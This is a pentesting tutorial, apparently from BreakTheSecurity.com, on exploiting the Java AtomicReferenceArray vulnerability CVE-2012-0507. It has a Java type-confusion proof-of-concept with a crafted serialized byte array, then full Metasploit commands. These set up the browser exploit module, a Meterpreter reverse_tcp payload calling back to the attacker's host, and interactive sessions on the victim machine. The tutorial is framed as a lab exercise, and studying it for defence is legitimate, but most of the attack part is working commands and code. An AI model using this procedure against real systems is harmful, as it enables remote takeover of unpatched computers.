EXPLOITING JAVA VULNERABILITY (CVE-2012-0507)

USING METASPLOIT

PenTesting Tutorials:

www.BreakTheSecurity.com

Introduction to java AtomicReferenceArray

vulnerability

About CVE-2012-0507

A vulnerability in the JRE due to the fact that The AtomicReferenceArray class implementation did not properly check if the array is of an expected Object[] type. The vulnerability found by Jeroen Frijters

A malicious Java application or applet could use

this flaw to cause Java Virtual Machine(JVM) to crash or bypass Java sandbox restrictions.

Problematic code

public AtomicReferenceArray(E[] array) {

this.array = array.clone();

}

Violating the Type Safety

import java.util.concurrent.atomic.*;class first{}public violateClass{public static void main(String a[]){Object obj=new first();AtomicReferenceArray r=new AtomicReferenceArray(new

first[1]);obj="Hell";r.set(0,obj);first f=(first)r.get(0);}}

Exploiting

By manually constructing a serialized object graph you can stick any array you want into an AtomicReferenceArray instance and then use the AtomicReferenceArray.set() method to write an arbitrary reference to violate type safety.

Arbitrary reference to violate type safety. import java.io.*;

import java.util.concurrent.atomic.*;

class Union1 { }class Union2 { }

public class test{  static byte[] buf = new byte[] {    -84, -19, 0, 5, 117, 114, 0, 19, 91, 76, 106, 97, 118, 97, 46, 108, 97, 110, 103,    46, 79, 98, 106, 101, 99, 116, 59, -112, -50, 88, -97, 16, 115, 41, 108, 2, 0,    0, 120, 112, 0, 0, 0, 2, 117, 114, 0, 9, 91, 76, 85, 110, 105, 111, 110, 49, 59,    -2, 44, -108, 17, -120, -74, -27, -1, 2, 0, 0, 120, 112, 0, 0, 0, 1, 112, 115,    114, 0, 48, 106, 97, 118, 97, 46, 117, 116, 105, 108, 46, 99, 111, 110, 99, 117,    114, 114, 101, 110, 116, 46, 97, 116, 111, 109, 105, 99, 46, 65, 116, 111, 109,    105, 99, 82, 101, 102, 101, 114, 101, 110, 99, 101, 65, 114, 114, 97, 121, -87,    -46, -34, -95, -66, 101, 96, 12, 2, 0, 1, 91, 0, 5, 97, 114, 114, 97, 121, 116,    0, 19, 91, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 79, 98, 106, 101,    99, 116, 59, 120, 112, 113, 0, 126, 0, 3  };

  public static void main(String[] args) throws Throwable  {    ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(buf));    Object[] arr = (Object[])ois.readObject();    Union1[] u1 = (Union1[])arr[0];    AtomicReferenceArray ara = (AtomicReferenceArray)arr[1];    ara.set(0, new Union2());    System.out.println(u1[0]);  }}

Exploiting this vulnerability using

metasploit

Requirements:

VirtualBox  Target OS(windows,...) PenTesting Distro(Backtrack ) JRE 6(unpatched version)

Preparing Target Machine Start the "Target" Machine.

Install the JRE 6.(I have already installed the JRE)

Preparing Attacker Machine Now, start the BT5. Open the Terminal and Type "msfupdate". 

This will update the Metasploit Framework(MSF) with the latest exploits.

Open the Terminal and type msfconsole Now type :

use exploit/multi/browser/java_atomicreferencearray The above command will use the

java_atomicreferencearray.rb module for the attack.

Now type "show options" to display the settings available and/or required for this specific module.

set SRVPORT 80 set URIPATH / set SRVHOST [Backtrack_ip]

How to get IP of Backtrack:

○ open the Terminal ○ Type ifconfig ○ It will display the IP

Payload

Type "show payloads“ . This will displays the list of payloads available to use

I am going to use the reverse_tcp payload. This payload will get reverse tcp connection from the Target to our machine.

Type set payload java/meterpreter/reverse_tcp

In order to get reverse connection, we have to set Backtrack IP in the LHOST.

So type the following command: set LHOST [Backtrack_IP]

EXPLOITAre you ready?! Let us

We have setup everything needed for the Exploit. So it is time to break into the Target machine.

Type "exploit" in the msfconsole.

This will start the reverse handler to our Machine and it will wait anyone that will connect to the our HTTP server (Eg: http://192.168.56.102)

Once victim connect to our server, it will send a jar will that will exploit the CVE-2012-0507 vulnerability.

Victim side We have set up our exploit. Let us see what happen

when our victim open our url.

Go to the “Target” VM. Open the Firefox Enter the url you got from the you got from the metasploit

exploit:Eg: http://192.168.56.102

No need to care about the ‘80’ in the URL becoz It is default port

It loads nothing

but in background : The Backtrack sends a jar file and

exploit the vulnerability. After successful exploit, it brings control

to Backtrack

Now type "sessions“ in the metasploit console, this will display the list of active sessions(victims list)

Type "sessions -i 1", this will open the connection to the session with the id '1' and bring you to Meterpreter

Meterpreter will help you to interact/control with the Target

Exploited in the Wild

On April 2012, The research conducted by Dr.Web determined that more than 600,000 Mac computers are infected with BackDoor.Flashback botnet.

Included in Exploit kits

I hope this article has given you a good insight into how to use MetaSploit Framework to exploit the Java vulnerability. 

I hope this will help you to get into the PenTesting world..!

For more PenTesting Tutorials :www.BreakTheSecurity.com